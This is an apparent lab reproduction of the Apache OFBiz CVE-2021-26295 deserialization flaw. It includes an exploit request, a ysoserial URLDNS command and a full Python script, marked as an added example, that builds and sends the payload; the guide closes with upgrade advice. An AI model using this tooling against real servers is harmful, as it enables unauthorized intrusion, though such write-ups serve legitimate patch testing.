Reproducing the Apache OFBiz RMI deserialization vulnerability (CVE-2021-26295)

Introduction

Apache OFBiz is an e-commerce platform used to build large and mid-sized, enterprise-grade, multi-tier, distributed e-commerce applications that run across platforms, databases and application servers.

Affected versions

apache:ofbiz < 17.12.06


 

Environment setup

docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz

Host port 811 maps to the container's HTTP port 8080, which is why the request below goes to 192.168.204.131:811.

 


Reproducing the vulnerability

Building the request

The request is an unauthenticated POST to /webtools/control/SOAPService. The body is a SOAP envelope in OFBiz's own XML serialization format; the <cus-obj> element carries a hex-encoded Java serialized object, which the server hex-decodes and deserializes, and that is where the gadget chain fires.

POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.204.131:811
Content-Length: 1023
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-HashMap>
        <map-Entry>
          <map-Key>
            <cus-obj>...</cus-obj>
          </map-Key>
          <map-Value>
            <std-String value="http://34fipn.dnslog.cn"/>
          </map-Value>
        </map-Entry>
      </map-HashMap>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

The hex string goes between <cus-obj> and </cus-obj> (the original payload is omitted here), and Content-Length must match the final body. The <std-String> is only the map value; the DNS callback comes from the serialized object inside <cus-obj>.


The content of <cus-obj> is generated directly with ysoserial. URLDNS is the right first choice: it needs no third-party gadget library on the target and only triggers a DNS lookup, so a hit on the DNS log proves the server deserialized the object without executing anything else:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://34fipn.dnslog.cn > 1.ot


Then convert the file to hex; the resulting string is what goes inside <cus-obj>:

import binascii

filename = '1.ot'
with open(filename, 'rb') as f:
    content = f.read()
# .decode() drops the b'...' wrapper so the output can be pasted as-is
print(binascii.hexlify(content).decode())
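The whole procedure in one script, as an added example that is not part of the original post: it reads the ysoserial output, checks that it is really a Java serialization stream, hex-encodes it, builds the same SOAP envelope as the captured request and optionally POSTs it. The function names, the script file name ofbiz_soap.py, the SAMPLE_PAYLOAD bytes (a bare stream header standing in for real ysoserial output) and the placeholder URL http://example.invalid are assumptions; a real run passes the 1.ot file and the dnslog domain from above.

```python
import binascii
import html
import sys
import urllib.error
import urllib.request

# Java serialization stream header: magic 0xACED, stream version 5.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Constructed sample (assumption): a bare stream header standing in for the
# real ysoserial output. A real run reads 1.ot instead; see main() below.
SAMPLE_PAYLOAD = JAVA_STREAM_MAGIC

# Same envelope as the captured request, with the hex blob and the map
# value left as placeholders.
ENVELOPE_TEMPLATE = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header/><soapenv:Body><ser><map-HashMap><map-Entry>"
    "<map-Key><cus-obj>{hex_payload}</cus-obj></map-Key>"
    '<map-Value><std-String value="{value}"/></map-Value>'
    "</map-Entry></map-HashMap></ser></soapenv:Body></soapenv:Envelope>"
)


def is_java_serialized(data: bytes) -> bool:
    """True if data starts with the Java serialization stream header."""
    return data.startswith(JAVA_STREAM_MAGIC)


def to_hex(data: bytes) -> str:
    """Lowercase hex string without the b'' wrapper, ready to paste into <cus-obj>."""
    return binascii.hexlify(data).decode("ascii")


def build_envelope(payload: bytes, value: str) -> str:
    """Wrap a serialized object in the SOAPService envelope.

    Raises ValueError for anything that is not a Java serialization stream,
    which catches the common mistake of hex-encoding an empty or truncated file.
    """
    if not is_java_serialized(payload):
        raise ValueError("payload does not start with the Java stream magic 0xACED0005")
    return ENVELOPE_TEMPLATE.format(
        hex_payload=to_hex(payload),
        value=html.escape(value, quote=True),  # keep the XML well-formed
    )


def send_envelope(url: str, envelope: str, timeout: float = 10.0) -> int:
    """POST the envelope and return the HTTP status code.

    The status code says little: success is confirmed by a lookup on the
    DNS log, not by the response, so 4xx/5xx are returned rather than raised.
    """
    req = urllib.request.Request(
        url,
        data=envelope.encode("utf-8"),
        method="POST",
        headers={"Content-Type": "application/xml"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def main(argv: list) -> int:
    """Usage: python3 ofbiz_soap.py 1.ot http://34fipn.dnslog.cn [http://host:811/webtools/control/SOAPService]"""
    if len(argv) < 3:
        # No arguments: just show what the envelope looks like for the sample bytes.
        print(build_envelope(SAMPLE_PAYLOAD, "http://example.invalid"))
        return 0
    with open(argv[1], "rb") as f:
        payload = f.read()
    envelope = build_envelope(payload, argv[2])
    if len(argv) > 3:
        print("HTTP", send_envelope(argv[3], envelope))
    else:
        print(envelope)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Without a target URL the script only prints the envelope, so it can be pasted into a proxy or curl; with one it sends the request itself and sets Content-Length correctly, which is easy to get wrong when editing the captured request by hand.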


Remediation

Upgrade to a fixed version (17.12.06 or later). Downloads and the vulnerability list are at:

https://ofbiz.apache.org/download.html#vulnerabilities



Copyright belongs to the original author. If reposting, please cite the source: https://www.ciocso.com/article/494.html
